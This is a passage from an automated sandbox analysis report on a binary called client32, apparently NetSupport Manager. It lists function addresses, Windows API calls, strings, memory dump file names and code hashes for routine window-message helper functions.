                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 11002150
                                                                                                                              • m_pToolbar, xrefs: 11002155
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
                                                                                                                              • API String ID: 2577986331-281161189
                                                                                                                              • Opcode ID: 35783d953fd85d00738a6eb2ba99d550ce6056d1f12e3eeb32741e389c5bd5cf
                                                                                                                              • Instruction ID: 060336b2bd4469f278674b99be49374638fb6687acdde2fc2171db53485ff0b1
                                                                                                                              • Opcode Fuzzy Hash: 35783d953fd85d00738a6eb2ba99d550ce6056d1f12e3eeb32741e389c5bd5cf
                                                                                                                              • Instruction Fuzzy Hash: C6E09239F00511ABE715CA65E844F8AF3E9BF98744F000165E515D3621C730EC01CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hWnd, xrefs: 110010A6
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 2046328329-2830328467
                                                                                                                              • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                              • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                                                              • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                                                              • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hWnd, xrefs: 11001066
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 819365019-2830328467
                                                                                                                              • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                              • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                                                              • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                                                              • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageA.USER32 ref: 11001113
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hWnd, xrefs: 110010F6
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 906220102-2830328467
                                                                                                                              • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                              • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                                                              • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                                                              • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11014130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,00001203,?,?), ref: 11014161
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101413E
                                                                                                                              • m_hWnd, xrefs: 11014143
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3507600817
                                                                                                                              • Opcode ID: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
                                                                                                                              • Instruction ID: ce752b6915aa01a8741080b9e5a2c0ea08f5e284845c2bca3d31cce01905913c
                                                                                                                              • Opcode Fuzzy Hash: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
                                                                                                                              • Instruction Fuzzy Hash: 60E08675A502187BD310DA81DC46FD6F39CEB55755F008126F9255A241D670B8408790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                                                              • m_hWnd, xrefs: 110151B6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3966830984
                                                                                                                              • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                              • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                                                              • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                                                              • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110141B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,00001201,?,?), ref: 110141E1
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141BE
                                                                                                                              • m_hWnd, xrefs: 110141C3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3507600817
                                                                                                                              • Opcode ID: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
                                                                                                                              • Instruction ID: e40b82f977eb721f415d7ce6a6c2c5c571fa6c694b71c8e0fe353644d2fc67f2
                                                                                                                              • Opcode Fuzzy Hash: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
                                                                                                                              • Instruction Fuzzy Hash: C6E0CD75A503187BD710DA81DC86FD7F39CDB54755F00C125FD2556640D670F950C790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11014230 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,00001204,?,?), ref: 11014261
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101423E
                                                                                                                              • m_hWnd, xrefs: 11014243
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3507600817
                                                                                                                              • Opcode ID: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
                                                                                                                              • Instruction ID: 55ae1fe25e9a5b1997f1acacac97235014ae2df67c49f839450db2036e8126b3
                                                                                                                              • Opcode Fuzzy Hash: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
                                                                                                                              • Instruction Fuzzy Hash: DDE086796502187BD3109A81DC46ED6F39CDB44765F00C125F9255A240D670B8408790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                                                              • m_hWnd, xrefs: 11017206
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3966830984
                                                                                                                              • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                              • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                                                              • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                                                              • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110141F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,00001205,00000000,?), ref: 1101421F
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
